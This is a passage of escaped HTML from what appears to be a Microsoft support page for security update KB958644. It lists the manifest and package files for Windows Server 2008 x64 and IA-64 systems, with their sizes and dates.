class=\"sbody-td\">Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,437</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,422</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,441</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,519</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_8b10fff30496576a.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,029</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:29</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_8bbe0f461d98ec8d.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,029</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">04:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,029</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,029</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:09</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><br/><span class=\"text-base\">Additional files for all supported IA-64-based versions of Windows Server 2008</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_5318e8eb9e87d0695533f066c047f96b_31bf3856ad364e35_6.0.6001.18157_none_82a29afb7aa0d23c.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_9c84e32c7f67dae6326ee85998cad9e6_31bf3856ad364e35_6.0.6001.18157_none_9713870461709fdd.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,038</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_f1b22e2871aa832be2376a26d588f7f5_31bf3856ad364e35_6.0.6001.22288_none_d0e8a3e531733c64.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,038</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_f420bbd70e5d59529cd3c0d55fc47000_31bf3856ad364e35_6.0.6001.22288_none_fa8a6023da16ba48.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d06b35901b0216b.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,048</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">08:04</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d70e0aa1ae52e5f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,048</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,748</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,452</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,961</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,885</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,961</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,885</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,415</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,434</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,416</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,436</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,419</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,438</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,424</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,444</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,416</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpesrv_0~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,435</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td 